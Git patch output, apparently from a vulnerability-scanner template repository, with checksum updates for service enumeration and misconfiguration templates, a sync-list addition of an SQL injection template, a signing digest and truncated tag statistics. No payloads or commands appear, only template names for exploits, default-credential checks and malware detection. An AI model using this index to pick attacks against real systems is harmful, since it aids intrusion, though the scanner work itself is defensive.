-javascript/enumeration/rsync/rsync-list-modules.yaml:f57ad0286243c14616e3f394d7ed42d71deaa085 -javascript/enumeration/rsync/rsync-version.yaml:284ec2be0fddd54e692fa817f1606b0ac9db2647 -javascript/enumeration/smb/smb-default-creds.yaml:97241c09af835f562f4a345a06d478b4d74d4a01 -javascript/enumeration/smb/smb-enum-domains.yaml:e2d93fb57a56cc6d69a8023c3f18a00fb7c2ee4d -javascript/enumeration/smb/smb-enum.yaml:4a06ae718b74844a0eecb34a62caaa835af7987f -javascript/enumeration/smb/smb-os-detect.yaml:6ff4e8e2de38dd9a0dbc0c20086bcc8e7bc3b376 -javascript/enumeration/smb/smb-version-detect.yaml:230c744f854ce4054cbccbd39f8159bdfc99e440 -javascript/enumeration/smb/smb2-capabilities.yaml:8619dcc3ce21261afc7622cdfdaa09bf27eba4ca -javascript/enumeration/smb/smb2-server-time.yaml:2e04fd11100689f78a7a5938728c183d7af9b958 +javascript/enumeration/mysql/mysql-default-login.yaml:98658fc2b084689f2e82129fcbf36f7294e10570 +javascript/enumeration/mysql/mysql-info.yaml:c1042c0700cad92e7b3329fe3d64be9914186c66 +javascript/enumeration/mysql/mysql-show-databases.yaml:4f95912ebfb4374efd5c35f8c7d778278e6cf60b +javascript/enumeration/mysql/mysql-show-variables.yaml:51219ecb4e9b349371d5cf858b8b365392670d85 +javascript/enumeration/mysql/mysql-user-enum.yaml:daa5aa135e798d8a2bce0fa75f1c60517b609917 +javascript/enumeration/pgsql/pgsql-default-db.yaml:9128f6907a558adc8bc8b636e9e89c98af6abc81 +javascript/enumeration/pgsql/pgsql-file-read.yaml:eaf13b28e58b23257390227d3eff04e633a3a374 +javascript/enumeration/pgsql/pgsql-list-database.yaml:7ab07255e7021f4c2c542ee154f185e1006b2c3e +javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:e73c7cc8518417f8f53f585da9e62f4065f22617 +javascript/enumeration/pgsql/pgsql-list-users.yaml:7c01111285951c2223fa9c5012f4be8a82beaaa8 +javascript/enumeration/pgsql/pgsql-version-detect.yaml:be34e9203c4c7feab03d6c0d725167adaf1ab389 +javascript/enumeration/pop3/pop3-capabilities-enum.yaml:9f95081532d27ad5b47d16eadc2b7eebccc7c862 +javascript/enumeration/redis/redis-info.yaml:20691d33fd5102042bde2525a8f85201143ef156 +javascript/enumeration/redis/redis-require-auth.yaml:e9b75a854eefad3ed5014cf4bea62dc434a47ac9 +javascript/enumeration/rsync/rsync-list-modules.yaml:2a1f75398dd679c537963233a487b8c931b398aa +javascript/enumeration/rsync/rsync-version.yaml:bdafd8818d9ab8722dc16c871fa0de534b823155 +javascript/enumeration/smb/smb-default-creds.yaml:d07defdc3f155d6f4fddec420e7484e89fd2bdaa +javascript/enumeration/smb/smb-enum-domains.yaml:6718b810d698d290198bd57703544c17c8bf44c8 +javascript/enumeration/smb/smb-enum.yaml:fb5efbd048d025d6fbc2f24f8b3112c1d463dfcf +javascript/enumeration/smb/smb-os-detect.yaml:29c367f677e588d3b89a8b7c70ce6b89c22d8bd3 +javascript/enumeration/smb/smb-version-detect.yaml:34c3693d6783ed144a18ddf4bfa0ad20417463d8 +javascript/enumeration/smb/smb2-capabilities.yaml:d51c6714f6415ce0f7ddba28fd51cf271f09e931 +javascript/enumeration/smb/smb2-server-time.yaml:390d11fb25388b62bfee4292b145dd1accf6df92 javascript/enumeration/ssh/obsolete-ssh-version.yaml:136a52496c5832d06d80ced805951ab7be25dbff javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml:95c983ec5f5cec534007b5a252f53e5d764d8512 javascript/enumeration/ssh/ssh-password-auth.yaml:50ca5eb9f3fba26eb72d9510b71ac4fbad8b4698 javascript/enumeration/ssh/ssh-server-enumeration.yaml:4253ab5aaab4bc8690c29788d7f7b298aedca45e javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml:cf9e950c3f3200c8af9aeedeb35fc90f2eb5b1af -javascript/misconfiguration/mysql/mysql-empty-password.yaml:d74a916c9e6761d44187fb6adb8e37242203232b -javascript/misconfiguration/pgsql/pgsql-empty-password.yaml:0d97931bfc914aaf9ee8170d169ef9561266be2f -javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml:078a6097b77f365398233a8ede230f5ef521fd03 -javascript/misconfiguration/smb/smb-anonymous-access.yaml:279461b6960ab222ff019cb1bf295e547fd76227 -javascript/misconfiguration/smb/smb-shares.yaml:b78c0ddc814e0438b5f8a11e320b0418977c8da2 -javascript/misconfiguration/smb/smb-signing-not-required.yaml:9d89599c89b869a4ac68da96b27da3085b19b7e3 +javascript/misconfiguration/mysql/mysql-empty-password.yaml:02197d9279ff5dca85a7a998d34edf54b6d2d815 +javascript/misconfiguration/pgsql/pgsql-empty-password.yaml:320b2b06ace17fad4ed16e7b3ce2a1cf41303549 +javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml:89dc8500253402c1827029bd1413dc1f817a5996 +javascript/misconfiguration/smb/smb-anonymous-access.yaml:b8f4e83c63d427948fe1fb0a422f6b0379dfb99d +javascript/misconfiguration/smb/smb-shares.yaml:efb4008e6ca91573c4c59128a5b7827682cacc12 +javascript/misconfiguration/smb/smb-signing-not-required.yaml:c83f21278f3a93d00438fb063e8120221f80ff56 javascript/misconfiguration/ssh/ssh-cbc-mode-ciphers.yaml:cc5d0034e363156cfcb6efe1b982fae8f2d0fdd1 javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa047b0c844faaeadb9580b javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 -javascript/udp/detection/tftp-detect.yaml:e6b1b530dc24c6a7926745ad46f4b93f5bb81a85 +javascript/udp/detection/tftp-detect.yaml:1803295ddc33a741509f1f86ce46de70c6127bce network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 network/c2/darkcomet-trojan.yaml:adde1a1a06abb9b7c86ee78e538769eaf8281d6e network/c2/darktrack-rat-trojan.yaml:87d27aa07133993bc44f0410eafb1385446c6020 @@ -8863,7 +8864,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ec1f88dd84f3474d4bd8dec941b5f12f0f8614c4 +templates-checksum.txt:8cdeacbe92a6e6e04f470f6e40d622e2d444e53d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 780d30a85f7218035f847e90211259da99fa534c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 12:50:26 +0000 Subject: [PATCH 1084/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 33f9db2a50..e8d7b6b2f6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -73,6 +73,7 @@ on: - 'http/vulnerabilities/other/azon-dominator-sqli.yaml' - 'http/vulnerabilities/other/bagisto-csti.yaml' - 'http/vulnerabilities/other/crocus-lfi.yaml' + - 'http/vulnerabilities/other/enjoyrmis-sqli.yaml' - 'http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml' - 'http/vulnerabilities/other/pingsheng-electronic-sqli.yaml' - 'http/vulnerabilities/other/sharp-printers-lfi.yaml' From 6e1546d1c61fdfdf7b7b0ab4af1d14f9a570acf5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 12:51:33 +0000 Subject: [PATCH 1085/1841] Auto Template Signing [Wed Jul 10 12:51:33 UTC 2024] :robot: --- http/vulnerabilities/other/enjoyrmis-sqli.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/other/enjoyrmis-sqli.yaml b/http/vulnerabilities/other/enjoyrmis-sqli.yaml index 5a6407a5ad..e3a7d5a970 100644 --- a/http/vulnerabilities/other/enjoyrmis-sqli.yaml +++ b/http/vulnerabilities/other/enjoyrmis-sqli.yaml @@ -38,3 +38,4 @@ http: - 'contains(header,"text/xml")' - 'status_code == 500' condition: and +# digest: 4a0a004730450220513988d1b627de15516cd810009872484dabe6fec068dbf7fa444d194ba5556e0221009e14aab414cb6378c10d990da66a26dc6aa4e8bf1365903580f01b815291b1d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 646e017210e23ab68c26cafd71250af972b8f8e9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 13:28:15 +0000 Subject: [PATCH 1086/1841] Auto Generated Templates Stats [Wed Jul 10 13:28:15 UTC 2024] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 11098 +++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 5581 insertions(+), 5539 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index d1eeef34ce..4fe4a5c5e4 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2540},{"name":"panel","count":1163},{"name":"wordpress","count":996},{"name":"exposure","count":955},{"name":"xss","count":913},{"name":"wp-plugin","count":865},{"name":"osint","count":804},{"name":"tech","count":694},{"name":"lfi","count":670},{"name":"misconfig","count":660},{"name":"rce","count":610},{"name":"edb","count":597},{"name":"packetstorm","count":542},{"name":"wpscan","count":505},{"name":"cve2021","count":493},{"name":"cve2022","count":472},{"name":"wp","count":431},{"name":"cve2023","count":384},{"name":"unauth","count":368},{"name":"sqli","count":361},{"name":"file","count":345},{"name":"authenticated","count":343},{"name":"intrusive","count":310},{"name":"detect","count":308},{"name":"login","count":295},{"name":"kev","count":275},{"name":"cve2020","count":255},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"top-200","count":221},{"name":"default-login","count":217},{"name":"devops","count":212},{"name":"osint-social","count":210},{"name":"malware","count":208},{"name":"network","count":196},{"name":"apache","count":193},{"name":"token","count":193},{"name":"","count":191},{"name":"cve2018","count":170},{"name":"cloud","count":169},{"name":"iot","count":167},{"name":"cve2019","count":163},{"name":"keys","count":156},{"name":"joomla","count":148},{"name":"install","count":147},{"name":"redirect","count":138},{"name":"tcp","count":137},{"name":"aws","count":135},{"name":"auth-bypass","count":133},{"name":"ssrf","count":120},{"name":"amazon","count":118},{"name":"phishing","count":117},{"name":"cve2024","count":114},{"name":"cms","count":113},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":91},{"name":"disclosure","count":89},{"name":"linux","count":85},{"name":"code","count":81},{"name":"local","count":80},{"name":"takeover","count":79},{"name":"privesc","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":74},{"name":"kubernetes","count":71},{"name":"oss","count":68},{"name":"cisco","count":67},{"name":"js","count":67},{"name":"enum","count":65},{"name":"adobe","count":63},{"name":"k8s","count":62},{"name":"ir","count":61},{"name":"huntr","count":60},{"name":"cve2015","count":59},{"name":"atlassian","count":59},{"name":"cve2016","count":57},{"name":"detection","count":57},{"name":"vmware","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"logs","count":48},{"name":"tenable","count":48},{"name":"log4j","count":47},{"name":"hackerone","count":46},{"name":"vulhub","count":46},{"name":"osint-gaming","count":45},{"name":"aem","count":45},{"name":"php","count":45},{"name":"debug","count":44},{"name":"cve2014","count":44},{"name":"generic","count":44},{"name":"jndi","count":44},{"name":"deserialization","count":43},{"name":"microsoft","count":42},{"name":"oa","count":42},{"name":"osint-hobby","count":42},{"name":"osint-porn","count":42},{"name":"plugin","count":42},{"name":"traversal","count":42},{"name":"cnvd","count":41},{"name":"springboot","count":41},{"name":"misc","count":40},{"name":"injection","count":38},{"name":"miscellaneous","count":38},{"name":"listing","count":38},{"name":"jira","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"k8s-cluster-security","count":34},{"name":"fuzz","count":34},{"name":"ssl","count":33},{"name":"tls","count":32},{"name":"devsecops","count":32},{"name":"dlink","count":31},{"name":"osint-tech","count":31},{"name":"wp-theme","count":30},{"name":"osint-coding","count":30},{"name":"ec2","count":30},{"name":"gitlab","count":28},{"name":"fortinet","count":28},{"name":"api","count":28},{"name":"citrix","count":27},{"name":"lfr","count":27},{"name":"proxy","count":27},{"name":"dns","count":27},{"name":"bestwebsoft","count":27},{"name":"ssh","count":26},{"name":"cve2012","count":26},{"name":"zohocorp","count":26},{"name":"firewall","count":26},{"name":"manageengine","count":25},{"name":"weaver","count":25},{"name":"file-upload","count":25},{"name":"osint-finance","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"admin","count":24},{"name":"osint-business","count":24},{"name":"zoho","count":24},{"name":"audit","count":23},{"name":"yonyou","count":23},{"name":"stored-xss","count":23},{"name":"xxe","count":23},{"name":"tomcat","count":23},{"name":"dast","count":22},{"name":"prestashop","count":22},{"name":"s3","count":22},{"name":"cicd","count":22},{"name":"github","count":22},{"name":"printer","count":21},{"name":"weblogic","count":21},{"name":"ecology","count":21},{"name":"msf","count":21},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"ftp","count":20},{"name":"hp","count":19},{"name":"grafana","count":19},{"name":"wavlink","count":19},{"name":"rukovoditel","count":19},{"name":"confluence","count":19},{"name":"struts","count":19},{"name":"apt","count":19},{"name":"node.js","count":18},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"coldfusion","count":18},{"name":"cve2011","count":18},{"name":"vpn","count":18},{"name":"osint-music","count":18},{"name":"mail","count":17},{"name":"honeypot","count":17},{"name":"microweber","count":17},{"name":"headless","count":17},{"name":"nginx","count":17},{"name":"azure","count":17},{"name":"service","count":16},{"name":"rconfig","count":16},{"name":"osint-blog","count":16},{"name":"magento","count":16},{"name":"cve2009","count":16},{"name":"zyxel","count":16},{"name":"alibaba","count":16},{"name":"status","count":16},{"name":"backup","count":16},{"name":"jarm","count":16},{"name":"backdoor","count":16},{"name":"tongda","count":15},{"name":"netgear","count":15},{"name":"redhat","count":15},{"name":"nagios","count":15},{"name":"moosocial","count":15},{"name":"dashboard","count":15},{"name":"cve2013","count":15},{"name":"installer","count":15},{"name":"docker","count":15},{"name":"cve2008","count":15},{"name":"ssti","count":15},{"name":"cnvd2021","count":15},{"name":"info-leak","count":15},{"name":"seeyon","count":15},{"name":"setup","count":15},{"name":"ivanti","count":15},{"name":"woocommerce","count":15},{"name":"bypass","count":15},{"name":"java","count":15},{"name":"ruby","count":15},{"name":"redis","count":14},{"name":"osint-health","count":14},{"name":"domainmod","count":14},{"name":"icewarp","count":14},{"name":"dell","count":14},{"name":"rds","count":14},{"name":"node","count":14},{"name":"smtp","count":14},{"name":"login-check","count":14},{"name":"nodejs","count":14},{"name":"npm","count":14},{"name":"jboss","count":14},{"name":"osint-art","count":14},{"name":"git","count":14},{"name":"creds-stuffing","count":14},{"name":"laravel","count":13},{"name":"fuzzing","count":13},{"name":"fortigate","count":13},{"name":"mysql","count":13},{"name":"graphql","count":13},{"name":"sonicwall","count":13},{"name":"postgresql","count":13},{"name":"cuppa","count":13},{"name":"windows","count":13},{"name":"osint-political","count":13},{"name":"cuppacms","count":13},{"name":"hashicorp","count":13},{"name":"rails","count":13},{"name":"airflow","count":13},{"name":"osint-dating","count":13},{"name":"auth","count":13},{"name":"abstractapi","count":13},{"name":"zimbra","count":12},{"name":"newrelic","count":12},{"name":"vbulletin","count":12},{"name":"netsweeper","count":12},{"name":"smb","count":12},{"name":"phpgurukul","count":12},{"name":"jetbrains","count":12},{"name":"ofbiz","count":12},{"name":"webserver","count":12},{"name":"deployments","count":12},{"name":"kafka","count":12},{"name":"drupal","count":12},{"name":"doppler","count":12},{"name":"osint-video","count":11},{"name":"hikvision","count":11},{"name":"prometheus","count":11},{"name":"cache","count":11},{"name":"django","count":11},{"name":"spring","count":11},{"name":"iis","count":11},{"name":"jolokia","count":11},{"name":"fastjson","count":11},{"name":"xwiki","count":11},{"name":"xstream","count":11},{"name":"iam","count":11},{"name":"dedecms","count":11},{"name":"glpi","count":11},{"name":"samsung","count":10},{"name":"symfony","count":10},{"name":"zabbix","count":10},{"name":"db","count":10},{"name":"solr","count":10},{"name":"dahua","count":10},{"name":"elasticsearch","count":10},{"name":"solarview","count":10},{"name":"crlf","count":10},{"name":"xstream_project","count":10},{"name":"digitalocean","count":10},{"name":"sitecore","count":10},{"name":"phpmyadmin","count":10},{"name":"dropbox","count":10},{"name":"progress","count":10},{"name":"thinkphp","count":10},{"name":"blind","count":10},{"name":"bitbucket","count":9},{"name":"pfsense","count":9},{"name":"kube","count":9},{"name":"scada","count":9},{"name":"gateway","count":9},{"name":"exchange","count":9},{"name":"facebook","count":9},{"name":"console","count":9},{"name":"wso2","count":9},{"name":"cnvd2020","count":9},{"name":"sophos","count":9},{"name":"opencats","count":9},{"name":"firebase","count":9},{"name":"elastic","count":9},{"name":"lucee","count":9},{"name":"artica","count":9},{"name":"gitea","count":9},{"name":"moodle","count":9},{"name":"cloudtrail","count":9},{"name":"druid","count":9},{"name":"secret","count":9},{"name":"python","count":9},{"name":"joomla\\!","count":9},{"name":"instrusive","count":9},{"name":"sangfor","count":9},{"name":"f5","count":9},{"name":"vcenter","count":9},{"name":"versa","count":9},{"name":"go","count":8},{"name":"nexus","count":8},{"name":"oauth","count":8},{"name":"solarwinds","count":8},{"name":"nagiosxi","count":8},{"name":"recon","count":8},{"name":"cacti","count":8},{"name":"emerge","count":8},{"name":"manager","count":8},{"name":"cloud-enum","count":8},{"name":"atom","count":8},{"name":"openemr","count":8},{"name":"lfprojects","count":8},{"name":"hms","count":8},{"name":"phpjabbers","count":8},{"name":"mlflow","count":8},{"name":"e-office","count":8},{"name":"ognl","count":8},{"name":"odoo","count":8},{"name":"metadata","count":8},{"name":"discord","count":8},{"name":"microfocus","count":8},{"name":"osint-news","count":8},{"name":"config-audit","count":8},{"name":"spotweb_project","count":8},{"name":"cisco-switch","count":8},{"name":"bucket","count":8},{"name":"spotweb","count":8},{"name":"phpinfo","count":8},{"name":"unauthenticated","count":8},{"name":"symantec","count":8},{"name":"mirai","count":8},{"name":"wanhu","count":8},{"name":"default-page","count":8},{"name":"huawei","count":8},{"name":"vrealize","count":7},{"name":"opensis","count":7},{"name":"vms","count":7},{"name":"ldap","count":7},{"name":"bloofox","count":7},{"name":"mobileiron","count":7},{"name":"blockchain","count":7},{"name":"landray","count":7},{"name":"squirrelmail","count":7},{"name":"rfi","count":7},{"name":"filemanager","count":7},{"name":"error","count":7},{"name":"moodating","count":7},{"name":"pmb","count":7},{"name":"gradio","count":7},{"name":"database","count":7},{"name":"telesquare","count":7},{"name":"vpc","count":7},{"name":"fortios","count":7},{"name":"mongodb","count":7},{"name":"maps","count":7},{"name":"nortekcontrol","count":7},{"name":"contec","count":7},{"name":"slack","count":7},{"name":"exploitdb","count":7},{"name":"twitter","count":7},{"name":"linkedin","count":7},{"name":"nacos","count":7},{"name":"monstra","count":7},{"name":"keking","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"pods","count":7},{"name":"shopify","count":7},{"name":"teamcity","count":7},{"name":"bigip","count":7},{"name":"ruckus","count":7},{"name":"avtech","count":7},{"name":"gogs","count":7},{"name":"websphere","count":7},{"name":"fpd","count":7},{"name":"oos","count":7},{"name":"activemq","count":7},{"name":"cobbler","count":6},{"name":"keycloak","count":6},{"name":"magmi","count":6},{"name":"rat","count":6},{"name":"jetty","count":6},{"name":"sql","count":6},{"name":"typo3","count":6},{"name":"microstrategy","count":6},{"name":"liferay","count":6},{"name":"sonarqube","count":6},{"name":"log","count":6},{"name":"online_fire_reporting_system_project","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"zhiyuan","count":6},{"name":"bmc","count":6},{"name":"jeecg","count":6},{"name":"synacor","count":6},{"name":"leak","count":6},{"name":"servicenow","count":6},{"name":"gcp","count":6},{"name":"plesk","count":6},{"name":"asp","count":6},{"name":"cockpit","count":6},{"name":"minio","count":6},{"name":"paypal","count":6},{"name":"kubelet","count":6},{"name":"asus","count":6},{"name":"security","count":6},{"name":"jamf","count":6},{"name":"beyondtrust","count":6},{"name":"online-fire-reporting","count":6},{"name":"tikiwiki","count":6},{"name":"chanjet","count":6},{"name":"mikrotik","count":6},{"name":"splunk","count":6},{"name":"openvpn","count":6},{"name":"express","count":6},{"name":"paloaltonetworks","count":6},{"name":"doctor-appointment-system","count":6},{"name":"advantech","count":6},{"name":"flutterwave","count":6},{"name":"74cms","count":6},{"name":"couchdb","count":6},{"name":"server","count":6},{"name":"elfinder","count":6},{"name":"webmin","count":6},{"name":"geoserver","count":6},{"name":"api-server","count":5},{"name":"mssql","count":5},{"name":"froxlor","count":5},{"name":"carrental","count":5},{"name":"adb","count":5},{"name":"craftcms","count":5},{"name":"voip","count":5},{"name":"qdpm","count":5},{"name":"open-emr","count":5},{"name":"tibco","count":5},{"name":"resin","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"sentry","count":5},{"name":"genetechsolutions","count":5},{"name":"adminer","count":5},{"name":"blackenergy","count":5},{"name":"firmware","count":5},{"name":"openfire","count":5},{"name":"asana","count":5},{"name":"pyload","count":5},{"name":"metinfo","count":5},{"name":"graylog","count":5},{"name":"web3","count":5},{"name":"openstack","count":5},{"name":"openai","count":5},{"name":"cloudflare","count":5},{"name":"redmine","count":5},{"name":"goanywhere","count":5},{"name":"digitaldruid","count":5},{"name":"etcd","count":5},{"name":"dionaea","count":5},{"name":"sftp","count":5},{"name":"mantisbt","count":5},{"name":"jwt","count":5},{"name":"magmi_project","count":5},{"name":"matrix","count":5},{"name":"hpe","count":5},{"name":"papercut","count":5},{"name":"jupyter","count":5},{"name":"square","count":5},{"name":"awstats","count":5},{"name":"xmlrpc","count":5},{"name":"terramaster","count":5},{"name":"hoteldruid","count":5},{"name":"nuuo","count":5},{"name":"parallels","count":5},{"name":"crushftp","count":5},{"name":"strapi","count":5},{"name":"tenda","count":5},{"name":"checkpoint","count":5},{"name":"kkfileview","count":5},{"name":"circontrol","count":5},{"name":"10web","count":5},{"name":"acm","count":5},{"name":"wpdevart","count":5},{"name":"password","count":5},{"name":"schneider-electric","count":5},{"name":"cve2007","count":5},{"name":"react","count":5},{"name":"qnap","count":5},{"name":"apisix","count":5},{"name":"avideo","count":5},{"name":"axigen","count":5},{"name":"gocd","count":5},{"name":"decision-center","count":5},{"name":"wbce","count":5},{"name":"http","count":5},{"name":"storage","count":5},{"name":"gnu","count":5},{"name":"fatpipe","count":5},{"name":"totolink","count":5},{"name":"cdata","count":5},{"name":"akamai","count":5},{"name":"webview","count":5},{"name":"ethereum","count":5},{"name":"percha","count":5},{"name":"agentejo","count":5},{"name":"webkul","count":5},{"name":"caucho","count":5},{"name":"chamilo","count":5},{"name":"spark","count":5},{"name":"sysaid","count":5},{"name":"glpi-project","count":5},{"name":"ems","count":5},{"name":"thedigitalcraft","count":5},{"name":"zzzcms","count":5},{"name":"hybris","count":5},{"name":"jabber","count":5},{"name":"telerik","count":5},{"name":"rseenet","count":5},{"name":"swagger","count":5},{"name":"connectwise","count":5},{"name":"circarlife","count":5},{"name":"avaya","count":5},{"name":"cnvd2023","count":5},{"name":"elementor","count":5},{"name":"harmistechnology","count":4},{"name":"grav","count":4},{"name":"pmb_project","count":4},{"name":"moveit","count":4},{"name":"zte","count":4},{"name":"osgeo","count":4},{"name":"juniper","count":4},{"name":"mostracms","count":4},{"name":"linkerd","count":4},{"name":"eclipse","count":4},{"name":"mautic","count":4},{"name":"auieo","count":4},{"name":"sendgrid","count":4},{"name":"shiro","count":4},{"name":"stripe","count":4},{"name":"hospital_management_system_project","count":4},{"name":"metersphere","count":4},{"name":"kevinlab","count":4},{"name":"datadog","count":4},{"name":"newstatpress","count":4},{"name":"centos","count":4},{"name":"kibana","count":4},{"name":"linksys","count":4},{"name":"pluginus","count":4},{"name":"ampache","count":4},{"name":"d-link","count":4},{"name":"newstatpress_project","count":4},{"name":"creativeitem","count":4},{"name":"aria","count":4},{"name":"sugarcrm","count":4},{"name":"ransomware","count":4},{"name":"sigb","count":4},{"name":"djangoproject","count":4},{"name":"webshell","count":4},{"name":"angular","count":4},{"name":"owncloud","count":4},{"name":"pip","count":4},{"name":"rabbitmq","count":4},{"name":"horde","count":4},{"name":"reprisesoftware","count":4},{"name":"imgproxy","count":4},{"name":"confluent","count":4},{"name":"httpd","count":4},{"name":"containers","count":4},{"name":"kentico","count":4},{"name":"pixie","count":4},{"name":"wcs","count":4},{"name":"ghost","count":4},{"name":"mailchimp","count":4},{"name":"esri","count":4},{"name":"search","count":4},{"name":"telegram","count":4},{"name":"proftpd","count":4},{"name":"webmail","count":4},{"name":"bamboo","count":4},{"name":"mostra","count":4},{"name":"dahuasecurity","count":4},{"name":"audiocodes","count":4},{"name":"aura","count":4},{"name":"kyocera","count":4},{"name":"opencms","count":4},{"name":"sound4","count":4},{"name":"consul","count":4},{"name":"info","count":4},{"name":"globalprotect","count":4},{"name":"harbor","count":4},{"name":"mooveagency","count":4},{"name":"artifactory","count":4},{"name":"ray","count":4},{"name":"springcloud","count":4},{"name":"royalevent","count":4},{"name":"puppet","count":4},{"name":"zend","count":4},{"name":"ternaria","count":4},{"name":"hongfan","count":4},{"name":"roxy","count":4},{"name":"myeventon","count":4},{"name":"mitel","count":4},{"name":"casaos","count":4},{"name":"os4ed","count":4},{"name":"jellyfin","count":4},{"name":"flickr","count":4},{"name":"flink","count":4},{"name":"tiki","count":4},{"name":"nextjs","count":4},{"name":"wireguard","count":4},{"name":"igniterealtime","count":4},{"name":"codeigniter","count":4},{"name":"osint-archived","count":4},{"name":"env","count":4},{"name":"mcafee","count":4},{"name":"jorani","count":4},{"name":"flatpress","count":4},{"name":"postmessage","count":4},{"name":"h3c","count":4},{"name":"pie-register","count":4},{"name":"thimpress","count":4},{"name":"cnvd2022","count":4},{"name":"nosqli","count":4},{"name":"yeswiki","count":4},{"name":"learnpress","count":4},{"name":"panabit","count":4},{"name":"umbraco","count":4},{"name":"photo","count":4},{"name":"dolibarr","count":4},{"name":"intelbras","count":4},{"name":"eyoucms","count":4},{"name":"rubyonrails","count":4},{"name":"httpserver","count":4},{"name":"dom","count":4},{"name":"finicity","count":4},{"name":"codoso","count":4},{"name":"rocketchat","count":4},{"name":"dotnet","count":4},{"name":"hongdian","count":4},{"name":"okta","count":4},{"name":"wp-statistics","count":4},{"name":"thinkcmf","count":4},{"name":"pega","count":4},{"name":"phppgadmin","count":4},{"name":"prtg","count":4},{"name":"linuxfoundation","count":4},{"name":"heroku","count":4},{"name":"bitrix","count":4},{"name":"phpjabber","count":4},{"name":"articatech","count":4},{"name":"figma","count":4},{"name":"salesforce","count":4},{"name":"metabase","count":4},{"name":"supsystic","count":4},{"name":"panos","count":4},{"name":"ebs","count":4},{"name":"candidats","count":4},{"name":"aspose","count":4},{"name":"terra-master","count":4},{"name":"kingsoft","count":4},{"name":"churchcrm","count":4},{"name":"jfrog","count":4},{"name":"gnuboard","count":4},{"name":"seagate","count":4},{"name":"arcgis","count":4},{"name":"joomlamo","count":4},{"name":"cnvd2019","count":4},{"name":"pentaho","count":4},{"name":"age-encryption","count":4},{"name":"powerjob","count":4},{"name":"metasploit","count":4},{"name":"bittrex","count":4},{"name":"easypost","count":4},{"name":"cve2005","count":4},{"name":"veronalabs","count":4},{"name":"concrete","count":4},{"name":"jsf","count":4},{"name":"fit2cloud","count":4},{"name":"teampass","count":3},{"name":"cpanel","count":3},{"name":"fanwei","count":3},{"name":"wordfence","count":3},{"name":"casdoor","count":3},{"name":"nortek","count":3},{"name":"suitecrm","count":3},{"name":"covenant","count":3},{"name":"ueditor","count":3},{"name":"projectsend","count":3},{"name":"rubygems","count":3},{"name":"default","count":3},{"name":"glassfish","count":3},{"name":"automattic","count":3},{"name":"openwrt","count":3},{"name":"steve","count":3},{"name":"dzzoffice","count":3},{"name":"targa","count":3},{"name":"sns","count":3},{"name":"rackn","count":3},{"name":"r-seenet","count":3},{"name":"webtareas_project","count":3},{"name":"sofacy","count":3},{"name":"revive","count":3},{"name":"decision-server","count":3},{"name":"webtareas","count":3},{"name":"jitsi","count":3},{"name":"etsy","count":3},{"name":"sidekiq","count":3},{"name":"cloudwatch","count":3},{"name":"securepoint","count":3},{"name":"emqx","count":3},{"name":"opencart","count":3},{"name":"apollo","count":3},{"name":"3cx","count":3},{"name":"droneci","count":3},{"name":"httpbin","count":3},{"name":"h2o","count":3},{"name":"yii","count":3},{"name":"diagrams","count":3},{"name":"finecms","count":3},{"name":"monitorr","count":3},{"name":"osticket","count":3},{"name":"softwarepublico","count":3},{"name":"influxdb","count":3},{"name":"bitrix24","count":3},{"name":"kavita","count":3},{"name":"ixcache","count":3},{"name":"forum","count":3},{"name":"octobercms","count":3},{"name":"eshop","count":3},{"name":"adafruit","count":3},{"name":"afterlogic","count":3},{"name":"airtable